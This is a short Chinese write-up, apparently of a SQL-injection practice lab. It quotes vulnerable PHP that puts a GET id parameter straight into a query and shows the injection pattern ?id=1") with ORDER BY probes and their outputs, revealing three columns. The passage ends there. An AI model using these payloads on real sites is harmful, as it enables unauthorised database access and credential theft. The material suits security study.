查看源代码:
if(isset($_GET['id']))
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
if($row)
{echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];}
else
{print_r(mysqli_error($con));}
输入形式为GET,注入格式为?id=1") and 1=1 --+且当正确时会显示Your Login name:和Your Password:,错误时不会显示任何东西
列数:
?id=1") order by 1 --+
Your Login name:Dumb
Your Password:Dumb
?id=1") order by 2 --+
Your Login name:Dumb
Your Password:Dumb
?id=1") order by 3 --+
Your Login name:Dumb
Your Password:Dumb
?id=1") order by 4 --+
Unknown column '4' in 'order clause'
即列数为3
</